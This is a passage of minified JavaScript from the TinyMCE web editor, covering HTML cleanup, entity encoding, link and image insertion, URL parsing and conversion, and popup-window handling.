RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var 